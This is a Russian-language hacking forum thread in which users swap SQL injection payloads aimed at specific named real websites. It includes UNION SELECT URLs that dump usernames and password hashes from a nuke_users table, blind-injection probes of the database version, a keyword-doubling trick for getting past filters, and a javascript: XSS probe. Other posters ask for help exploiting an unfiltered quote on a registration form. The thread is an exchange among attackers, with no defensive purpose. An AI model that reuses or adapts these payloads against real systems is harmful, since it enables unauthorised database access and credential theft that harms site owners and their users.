http://www.xtrempc.ro/modules.php?id_articol=-8177+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,@@basedir,12,13,14,15,16,17,18,19,20&name=Articole&skin=0&subtip=Stire&tip=jocuri /usr/local/mysql/ basedir съело..
@@basedir, @@version_compile_os....etc такие запросы сьедает...я про основные и как мне вывести инфу из БД
Здравствуйте.Я нашел sql-inj подобрал столбцы http://shop.vuku.ru/index.php?productID=-445+union+select+1,2,3,4-- но почему-то я немогу даже версию узнать бд.В чем моя ошибка?Что оттуда можно вытащить?
Code: http://www.xtrempc.ro/modules.php?id_articol=-8177+UNION+SELECT+1,2,username,4,5,6,7,8,9,10,user_password,12,13,14,15,16,17,18,19,20+from+nuke_users+limit+1,1&name=Articole&skin=0&subtip=Stire&tip=jocuri все вроде нормально выводится, только скобочки нельзя ставить
У тебя там вывода нету...используй как слепую.. http://forum.antichat.ru/threadnav43966-1-10.html Пункт 3.3
TreV@N обычная слепая скуля http://realquest.real-host.ru/show.php?id=12+AND+SUBSTRING((version()),1,1)=x Version : 5.0.77-community User : realq137_quest@localhost Database : realq137_quest
Чи не фильтр(Скуля зрячая, надо просто немного подумать): http://realquest.real-host.ru/show.php?id=-12+UNION+SeSelectlect+1,concat_ws(0x3a,user(),version(),database()),3,4--+
Набрал такую ссылку,вывел мне запрос гляньте скажите че это http://www.spravkaweb.ru/javascript:_alert%28%27Hello_world%27%29%3B
http://www.spravkaweb.ru/jhj'_union_select_1,2,3,concat(user(),0x3a,version()),5,'1 забавная скуль) жаль, что знак подчеркивания на пробел заменяется...
ребят помогите пожалуйста на одном сайте есть регалка в которой не фильтруется кавычка при этом база выдает ошибку такого вида Можно ли чего с этим сделать???
